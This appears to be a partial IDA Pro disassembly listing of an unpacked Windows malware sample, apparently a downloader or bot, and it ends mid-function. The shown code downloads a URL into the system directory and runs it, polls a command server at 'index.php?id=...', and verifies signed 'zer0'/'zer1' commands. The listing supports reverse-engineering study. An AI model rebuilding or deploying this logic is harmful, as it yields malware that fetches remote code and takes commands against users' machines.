;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 28F5BE93B07B0B09D0F0B0D2ACA08418
; File Name : u:\work\28f5be93b07b0b09d0f0b0d2aca08418_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31430000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31431000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31431000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31431004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31431008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3143100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31432A49+1D�r
dword_31431010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31431014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31432A49+4E�r ...
dword_31431018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3143101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31431020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31431024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31431028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3143102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31431030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31431034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31431038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31431040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31431044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31431048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3143104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31431050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31431054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31431058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3143105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31431060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31431064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31431068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31432D2E+8F�r
dword_3143106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_31431070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_31431074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31432C62+F�r
dword_31431078 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_3143107C dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_31431080 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_314311A0+F6�r ...
dword_31431084 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_3143237F+57�r
dword_31431088 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_3143141F+64�r ...
dword_3143108C dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31432C62+40�r
dword_31431090 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31432C62+1B�r
dword_31431094 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchange ; sub_3143185D+1�r
dword_31431098 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_3143109C dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_314319BC+16C�r ...
dword_314310A0 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_314310A4 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_314310A8 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31431FAB+2C�r
dword_314310AC dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_3143256D+124�r
dword_314310B0 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_314310B4 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_31432AF5+92�r
dword_314310B8 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:314324F1�r
dword_314310BC dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_314310C0 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_314310C4 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_3143210D+12�r
dword_314310C8 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_314310CC dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_314310D0 dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_314310D4 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_3143237F+66�r ...
dword_314310D8 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_3143278A+3E�r ...
dword_314310DC dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_314310E0 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_314310E4 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31432C62+C3�r
dd 0
dword_314310EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_314310F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_314310F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_314310F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_314310FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_3143212E:loc_3143213F�r ...
; ---------------------------------------------------------------------------
loc_31431100: ; DATA XREF: UPX0:loc_31432EA0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31431104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3143141F+1A0�r ...
dword_31431108 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_3143110C dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_3143141F+B4�r
dd 0
dword_31431114 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31431118 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_3143111C dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_31431120 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_31431782+5D�r ...
align 8
dword_31431128 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_31431782+9D�r
dword_3143112C dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_31431782+89�r
dword_31431130 dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31431134 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:31432967�r
dword_31431138 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_31431782+B0�r
align 10h
dword_31431140 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31431144 dd 71AB3E00h ; resolved to->WS2_32.binddword_31431148 dd 71AB88D3h ; resolved to->WS2_32.listendword_3143114C dd 71AC1028h ; resolved to->WS2_32.acceptdword_31431150 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31431154 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31431158 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_3143115C dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_3143237F+AC�r
dword_31431160 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_314328D7+D�r
dword_31431164 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_3143237F+F0�r
dword_31431168 dd 71AB406Ah ; resolved to->WS2_32.connectdword_3143116C dd 71AB428Ah ; resolved to->WS2_32.send ; sub_31432239+67�r ...
dword_31431170 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_314319BC+1D8�r ...
dword_31431174 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_31432239+128�r
dword_31431178 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_31432239+12F�r
align 10h
dword_31431180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
dword_31431190 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314311A0 proc near ; CODE XREF: sub_3143141F+172�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_3143112C ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_314311CB
push 1
jmp loc_31431261
; ---------------------------------------------------------------------------
loc_314311CB: ; CODE XREF: sub_314311A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_31431090 ; GetSystemDirectoryA
mov edi, dword_3143108C
lea eax, [ebp+var_110]
push offset dword_314341F8
push eax
call edi ; dword_3143108C
lea eax, [ebp+var_110]
push 6
push eax
call dword_31431088 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_3143212E
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_314341F0
push eax
call edi ; dword_3143108C
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_31431084 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31431241
push 2
jmp short loc_31431261
; ---------------------------------------------------------------------------
loc_31431241: ; CODE XREF: sub_314311A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31431128 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31431264
push [ebp+var_4]
call dword_31431080 ; CloseHandle
push 3
loc_31431261: ; CODE XREF: sub_314311A0+26�j
; sub_314311A0+9F�j
pop eax
jmp short loc_314312B5
; ---------------------------------------------------------------------------
loc_31431264: ; CODE XREF: sub_314311A0+B4�j
mov edi, 100000h
push edi
call sub_31432E6C
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31431138 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_3143107C ; WriteFile
push [ebp+var_4]
call dword_31431080 ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_3143215E
push ebx
call sub_31432E80
add esp, 0Ch
xor eax, eax
loc_314312B5: ; CODE XREF: sub_314311A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_314311A0 endp
; =============== S U B R O U T I N E =======================================
sub_314312BA proc near ; CODE XREF: sub_3143141F+103�p
; sub_3143141F+1DE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp [esp+arg_8], 0
jle short locret_31431312
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_314312D8: ; CODE XREF: sub_314312BA+53�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
shl bl, 4
xor dl, bl
add eax, 3
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, [esp+0Ch+arg_8]
jl short loc_314312D8
pop edi
pop esi
pop ebx
locret_31431312: ; CODE XREF: sub_314312BA+5�j
retn
sub_314312BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431313 proc near ; CODE XREF: sub_31431398+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31431346
add ebx, 1Ah
loc_31431346: ; CODE XREF: sub_31431313+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_3143110C
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; dword_3143110C
pop ecx
test eax, eax
pop ecx
jz short loc_31431370
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31431393
; ---------------------------------------------------------------------------
loc_31431370: ; CODE XREF: sub_31431313+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; dword_3143110C
pop ecx
test eax, eax
pop ecx
jz short loc_31431390
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31431393
; ---------------------------------------------------------------------------
loc_31431390: ; CODE XREF: sub_31431313+68�j
mov al, [ebp+arg_0]
loc_31431393: ; CODE XREF: sub_31431313+5B�j
; sub_31431313+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31431313 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431398 proc near ; CODE XREF: sub_3143141F+E0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_314313F5
mov edi, [ebp+arg_0]
push ebx
loc_314313AD: ; CODE XREF: sub_31431398+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_31431313
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_314313D9
cmp bl, 7Ah
jg short loc_314313D9
movsx esi, bl
sub esi, 61h
loc_314313D9: ; CODE XREF: sub_31431398+34�j
; sub_31431398+39�j
cmp bl, 41h
jl short loc_314313E9
cmp bl, 5Ah
jg short loc_314313E9
movsx esi, bl
sub esi, 41h
loc_314313E9: ; CODE XREF: sub_31431398+44�j
; sub_31431398+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_314313AD
pop ebx
jmp short loc_314313F8
; ---------------------------------------------------------------------------
loc_314313F5: ; CODE XREF: sub_31431398+F�j
mov edi, [ebp+arg_0]
loc_314313F8: ; CODE XREF: sub_31431398+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_31431398 endp
; =============== S U B R O U T I N E =======================================
sub_314313FF proc near ; CODE XREF: sub_3143141F+10F�p
; sub_3143141F+1FC�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_31431403: ; CODE XREF: sub_314313FF+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_31431403
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_314313FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143141F proc near ; CODE XREF: sub_31431782+BA�p
var_1EC = dword ptr -1ECh
var_1E8 = byte ptr -1E8h
var_1CC = byte ptr -1CCh
var_1B8 = dword ptr -1B8h
var_1B4 = byte ptr -1B4h
var_184 = dword ptr -184h
var_180 = dword ptr -180h
var_17C = dword ptr -17Ch
var_178 = byte ptr -178h
var_174 = byte ptr -174h
var_16C = byte ptr -16Ch
var_168 = byte ptr -168h
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_120 = byte ptr -120h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31431180
push offset loc_31432EA0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1DCh
push ebx
push esi
push edi
mov [ebp+var_12C], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_31431104 ; strstr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_314315B7
add esi, 4
mov [ebp+var_134], esi
jz loc_314315B7
push esi
call dword_31431088 ; lstrlenA
mov [ebp+var_20], eax
cmp eax, 50h
jle loc_314315B7
lea eax, [esi+100h]
mov cl, [eax]
mov [ebp+var_174], cl
and byte ptr [eax], 0
mov al, [esi]
mov [ebp+var_16C], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_130], ebx
js loc_314315AB
cmp ebx, 1Ah
jge loc_314315AB
inc esi
mov [ebp+var_134], esi
push 7Eh
push esi
call dword_3143110C ; strchr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_138], edi
test edi, edi
jz loc_314315AB
mov al, [edi]
mov [ebp+var_178], al
and byte ptr [edi], 0
push ebx
push esi
lea eax, [ebp+var_120]
push eax
call sub_31431398
mov al, [ebp+var_178]
mov [edi], al
lea esi, [edi+1]
mov [ebp+var_134], esi
push 30h
lea eax, [ebp+var_168]
push eax
lea eax, [esi+1]
push eax
call sub_314312BA
lea eax, [ebp+var_168]
push eax
call sub_314313FF
add esp, 1Ch
cmp [esi], al
jnz short loc_314315AB
push 44h
push offset dword_31434000
lea eax, [ebp+var_128]
push eax
call sub_314318EA
add esp, 0Ch
lea eax, [ebp+var_1C]
push eax
push 30h
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_120]
push eax
call dword_31431088 ; lstrlenA
push eax
lea eax, [ebp+var_120]
push eax
lea eax, [ebp+var_128]
push eax
call sub_31431955
add esp, 18h
test eax, eax
jnz short loc_3143159E
cmp [ebp+var_1C], eax
jz short loc_3143159E
lea eax, [ebp+var_120]
push eax
call sub_314311A0
pop ecx
and [ebp+var_12C], 0
loc_3143159E: ; CODE XREF: sub_3143141F+164�j
; sub_3143141F+169�j
lea eax, [ebp+var_128]
push eax
call sub_31431939
pop ecx
loc_314315AB: ; CODE XREF: sub_3143141F+9B�j
; sub_3143141F+A4�j ...
mov al, [ebp+var_174]
mov [esi+100h], al
loc_314315B7: ; CODE XREF: sub_3143141F+4E�j
; sub_3143141F+5D�j ...
push offset aZer1 ; "zer1"
push [ebp+arg_0]
call dword_31431104 ; strstr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_31431763
add esi, 4
mov [ebp+var_134], esi
push esi
call dword_31431088 ; lstrlenA
mov [ebp+var_20], eax
cmp eax, 5Ah
jle loc_31431763
push 0Ch
lea eax, [ebp+var_184]
push eax
push esi
call sub_314312BA
push 30h
lea eax, [ebp+var_1B4]
push eax
lea eax, [esi+13h]
push eax
call sub_314312BA
lea eax, [ebp+var_1B4]
push eax
call sub_314313FF
add esp, 1Ch
cmp [esi+12h], al
jnz loc_31431763
push 44h
push offset dword_31434000
lea eax, [ebp+var_128]
push eax
call sub_314318EA
lea eax, [ebp+var_1C]
push eax
push 30h
lea eax, [ebp+var_1B4]
push eax
push 0Ch
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_128]
push eax
call sub_31431955
add esp, 24h
test eax, eax
jnz loc_31431756
cmp [ebp+var_1C], eax
jz loc_31431756
push 7
pop ecx
mov esi, offset aSoftwareMicros ; "Software\\Microsoft\\Wireless"
lea edi, [ebp+var_1E8]
rep movsd
mov eax, dword_3143426C
mov [ebp+var_1B8], eax
push 13h
lea eax, [ebp+var_1CC]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_1E8]
push eax
mov esi, 80000002h
push esi
call sub_31432A49
add esp, 14h
test eax, eax
jnz short loc_314316CF
lea eax, [ebp+var_1CC]
push eax
call dword_31431108 ; atoi
pop ecx
mov [ebp+var_1EC], eax
jmp short loc_314316D6
; ---------------------------------------------------------------------------
loc_314316CF: ; CODE XREF: sub_3143141F+298�j
and [ebp+var_1EC], 0
loc_314316D6: ; CODE XREF: sub_3143141F+2AE�j
mov eax, [ebp+var_184]
cmp [ebp+var_1EC], eax
jnb short loc_3143174F
mov [ebp+var_1EC], eax
push eax
push offset aD ; "%d"
lea eax, [ebp+var_1CC]
push eax
call dword_31431120 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_1CC]
push eax
call dword_31431088 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_1CC]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_1E8]
push eax
push esi
call sub_31432AA2
add esp, 14h
cmp dword_31435048, 0
jnz short loc_3143173E
push [ebp+var_180]
jmp short loc_31431744
; ---------------------------------------------------------------------------
loc_3143173E: ; CODE XREF: sub_3143141F+315�j
push [ebp+var_17C]
loc_31431744: ; CODE XREF: sub_3143141F+31D�j
push offset dword_3143504C
call dword_31431094 ; InterlockedExchange
loc_3143174F: ; CODE XREF: sub_3143141F+2C3�j
and [ebp+var_12C], 0
loc_31431756: ; CODE XREF: sub_3143141F+247�j
; sub_3143141F+250�j
lea eax, [ebp+var_128]
push eax
call sub_31431939
pop ecx
loc_31431763: ; CODE XREF: sub_3143141F+1B2�j
; sub_3143141F+1CE�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_12C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_3143141F endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431782 proc near ; CODE XREF: sub_3143185D+2A�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31432E6C
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31431098 ; GetLocaleInfoA
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_314317EA
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_3143502C
push dword_31435044
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_31431120 ; wsprintfA
add esp, 1Ch
jmp short loc_31431802
; ---------------------------------------------------------------------------
loc_314317EA: ; CODE XREF: sub_31431782+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_31431120 ; wsprintfA
add esp, 0Ch
loc_31431802: ; CODE XREF: sub_31431782+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_3143112C ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_31431128 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_31431138 ; InternetReadFile
push esi
mov [ebp+arg_4], eax
call sub_3143141F
push esi
call sub_31432E80
mov esi, dword_31431130
pop ecx
pop ecx
push ebx
call esi ; dword_31431130
push edi
call esi ; dword_31431130
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
leave
retn
sub_31431782 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_3143185D proc near ; DATA XREF: sub_3143256D+169�o
push ebx
mov ebx, dword_31431094
push esi
push edi
loc_31431866: ; CODE XREF: sub_3143185D+88�j
xor esi, esi
mov edi, 46021h
loc_3143186D: ; CODE XREF: sub_3143185D+86�j
inc esi
inc esi
call sub_314321F3
test eax, eax
jz short loc_314318B7
mov al, byte_31434080[esi+esi*4]
push eax
push off_31434081[esi+esi*4]
call sub_31431782
or eax, edi
pop ecx
xor eax, 8064h
pop ecx
shl eax, 3
mov edi, eax
xor eax, 228h
test ax, 0FFFFh
jnz short loc_314318B7
push 0
push offset dword_31435044
call ebx ; dword_31431094
push 0
push offset dword_3143502C
call ebx ; dword_31431094
loc_314318B7: ; CODE XREF: sub_3143185D+19�j
; sub_3143185D+46�j
call dword_314310FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31432223
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_3143109C ; Sleep
cmp esi, 16h
jb short loc_3143186D
jmp loc_31431866
sub_3143185D endp
; =============== S U B R O U T I N E =======================================
sub_314318EA proc near ; CODE XREF: sub_3143141F+129�p
; sub_3143141F+21B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31431034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; dword_31431034
test eax, eax
jnz short loc_31431917
push 8
push 1
push edi
push edi
push ebx
call esi ; dword_31431034
test eax, eax
jnz short loc_31431917
push 1
pop eax
jmp short loc_31431935
; ---------------------------------------------------------------------------
loc_31431917: ; CODE XREF: sub_314318EA+19�j
; sub_314318EA+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31431038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_31431935: ; CODE XREF: sub_314318EA+2B�j
pop edi
pop esi
pop ebx
retn
sub_314318EA endp
; =============== S U B R O U T I N E =======================================
sub_31431939 proc near ; CODE XREF: sub_3143141F+186�p
; sub_3143141F+33E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3143102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31431030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_31431939 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431955 proc near ; CODE XREF: sub_3143141F+15A�p
; sub_3143141F+23D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3143101C ; CryptCreateHash
test eax, eax
jnz short loc_3143197B
push 1
pop eax
jmp short loc_314319B8
; ---------------------------------------------------------------------------
loc_3143197B: ; CODE XREF: sub_31431955+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31431020 ; CryptHashData
test eax, eax
jnz short loc_31431994
push 2
pop edi
jmp short loc_314319AD
; ---------------------------------------------------------------------------
loc_31431994: ; CODE XREF: sub_31431955+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31431024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_314319AD: ; CODE XREF: sub_31431955+3D�j
push [ebp+arg_0]
call dword_31431028 ; CryptDestroyHash
mov eax, edi
loc_314319B8: ; CODE XREF: sub_31431955+24�j
pop edi
pop esi
pop ebp
retn
sub_31431955 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314319BC proc near ; CODE XREF: sub_31432728+35�p
; sub_3143278A+47�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
